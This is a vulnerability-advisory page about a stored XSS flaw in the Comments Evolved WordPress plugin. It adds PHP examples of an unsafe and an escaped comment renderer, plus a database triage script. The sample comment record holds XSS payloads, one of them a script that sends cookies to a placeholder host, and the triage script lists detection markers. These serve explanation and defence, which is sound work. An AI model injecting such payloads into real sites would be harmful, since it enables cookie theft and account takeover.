VYPR
Medium severity (5.9) · NVD Advisory · Published May 14, 2024 · Updated Apr 28, 2026 · No known patch

CVE-2024-34420

Description

Stored XSS vulnerability in Comments Evolved for WordPress up to version 1.6.3 allows attackers to inject malicious scripts into pages.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

The Comments Evolved for WordPress plugin, versions up to and including 1.6.3, fails to properly neutralize user-controlled input when it generates web pages. This is Improper Neutralization of Input During Web Page Generation, better known as Cross-site Scripting (XSS, CWE-79): an attacker can inject arbitrary script that is stored on the server and later executed in the browser of any visitor who views the affected page [1].
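The pattern behind the finding, shown as an added illustration rather than code from the Comments Evolved plugin: a comment renderer that concatenates stored, attacker-controlled fields straight into markup, beside the same renderer hardened with WordPress core's context-specific escaping functions (esc_url, esc_html, wp_kses_post, which are real core functions; the comment record and the render functions are constructed for this example). The block assumes WordPress is loaded, for example via `wp eval-file`.

```php
<?php
// Added example: not code from the Comments Evolved plugin or this advisory's reference.
// Assumes WordPress core is loaded so esc_url(), esc_html() and wp_kses_post() exist.

// Constructed comment row standing in for a stored record whose fields an attacker controls.
$stored_comment = [
    'author'  => 'guest<script>alert(1)</script>',
    'url'     => 'javascript:alert(document.cookie)',
    'content' => 'Nice post <img src=x onerror="alert(document.cookie)">'
               . '<script>fetch("https://example.invalid/?c=" + document.cookie)</script>',
];

// VULNERABLE: stored text is interpolated into HTML with no output encoding,
// so the <script> tag, the onerror handler and the javascript: URL all reach the browser.
function render_comment_unsafe(array $c): string {
    return '<div class="comment">'
         . '<a href="' . $c['url'] . '">' . $c['author'] . '</a>'
         . '<p>' . $c['content'] . '</p>'
         . '</div>';
}

// HARDENED: each value is escaped for the context it lands in.
//  - esc_url()      drops URLs whose scheme is not in the allowed list (javascript: becomes '').
//  - esc_html()     entity-encodes text placed between tags.
//  - wp_kses_post() keeps the post-safe tag allowlist (img with src stays) but strips
//                   <script> and on* event-handler attributes.
function render_comment_safe(array $c): string {
    return '<div class="comment">'
         . '<a href="' . esc_url($c['url']) . '">' . esc_html($c['author']) . '</a>'
         . '<p>' . wp_kses_post($c['content']) . '</p>'
         . '</div>';
}

echo "UNSAFE:\n" . render_comment_unsafe($stored_comment) . "\n\n";
echo "SAFE:\n"   . render_comment_safe($stored_comment)   . "\n";
```

The choice of escaping function follows the output context, not the input: the same comment body needs esc_attr() if it is ever written into an attribute and wp_json_encode() if it is handed to inline JavaScript. Sanitising once on input (for example with sanitize_text_field()) is not a substitute, because stored data can be re-rendered in a different context later.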

The vulnerability is classified as Stored XSS, meaning the injected payload persists in the database and is served to users without further interaction from the attacker. According to the reference, getting the payload stored requires a privileged user (e.g., an administrator) to submit it, or to be induced to do so through a malicious link or crafted form; once it is stored, the script executes for every subsequent visitor of the affected page [1].

A successful attack lets the injected script act in the victim's browser session: redirecting users to malicious sites, displaying unwanted advertisements, or stealing sensitive data such as session cookies and form input. Stored XSS in WordPress plugins is routinely used in mass-exploit campaigns that target thousands of websites regardless of their size or popularity [1].

No patched version has been released; every distributed version up to and including 1.6.3 remains affected. Since the plugin has also been removed from the WordPress.org directory, the practical mitigation is to deactivate and uninstall it rather than wait for an update. Site owners who cannot do this themselves should seek assistance from their hosting provider or web developer. Note that uninstalling removes the vulnerable code path but not any payload already stored in the database, so content the plugin wrote should be reviewed as well [1].
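A follow-up check for the caveat above, added here as an example and not part of the advisory or the plugin: after the plugin is uninstalled, search the standard WordPress comment and post tables for markup that legitimate stored content should never contain. It uses the real $wpdb API (prepare, esc_like, get_results) and is meant to be run with WP-CLI (`wp eval-file`). The assumption that the payload landed in wp_comments or wp_posts is the author's; this page does not document where Comments Evolved stores the injected content, so adapt the table list to whatever the plugin wrote to on your site.

```php
<?php
// Added triage script: not code from the plugin or this advisory's reference.
// Run inside WordPress, e.g.  wp eval-file find-stored-payloads.php  (hypothetical filename).
// Assumption: injected markup is in the standard comment/post tables; extend $targets as needed.

global $wpdb;

// Substrings that should not appear in stored comment or post bodies.
// MySQL LIKE is case-insensitive under the default collations, so <SCRIPT> is matched too.
$markers = ['<script', 'javascript:', 'onerror=', 'onload=', 'srcdoc=', 'data:text/html'];

// table => [id column, text column]
$targets = [
    $wpdb->comments => ['comment_ID', 'comment_content'],
    $wpdb->posts    => ['ID',         'post_content'],
];

/**
 * Return rows of $table whose $text_col contains any marker, keyed by id.
 * Identifiers come from the fixed $targets map above; only the LIKE value is user-derived
 * and it goes through esc_like() + prepare() so % and _ in a marker cannot widen the match.
 */
function find_suspicious_rows(wpdb $db, string $table, string $id_col, string $text_col, array $markers): array {
    $hits = [];
    foreach ($markers as $marker) {
        $like = '%' . $db->esc_like($marker) . '%';
        $sql  = $db->prepare(
            "SELECT {$id_col} AS id, {$text_col} AS body FROM {$table} WHERE {$text_col} LIKE %s",
            $like
        );
        foreach ($db->get_results($sql, ARRAY_A) as $row) {
            $hits[$row['id']]['body']      = $row['body'];
            $hits[$row['id']]['markers'][] = $marker;
        }
    }
    return $hits;
}

foreach ($targets as $table => [$id_col, $text_col]) {
    $hits = find_suspicious_rows($wpdb, $table, $id_col, $text_col, $markers);
    printf("%s: %d suspicious row(s)\n", $table, count($hits));
    foreach ($hits as $id => $hit) {
        // Show what wp_kses_post() would have kept, so the reviewer sees exactly what was dangerous.
        $stripped = wp_kses_post($hit['body']);
        printf("  id=%s markers=%s\n", $id, implode(',', array_unique($hit['markers'])));
        printf("  removed by wp_kses_post: %d bytes\n", strlen($hit['body']) - strlen($stripped));
    }
}
```

Treat a hit as an indicator, not a verdict: some themes legitimately store inline script in post content. Review each flagged row, and if the payload is confirmed, invalidate sessions for administrators who viewed the affected page, since cookie theft is the usual goal of such a script.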

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0

Plugin removed: Comments Evolved for WordPress (slug: gplus-comments)

This plugin was removed from the WordPress.org directory on 2024-04-12 (reason: Security Issue). No patched version is being distributed through the official directory. Users who have it installed should deactivate and uninstall it.

Source: api.wordpress.org · directory page

References: 1
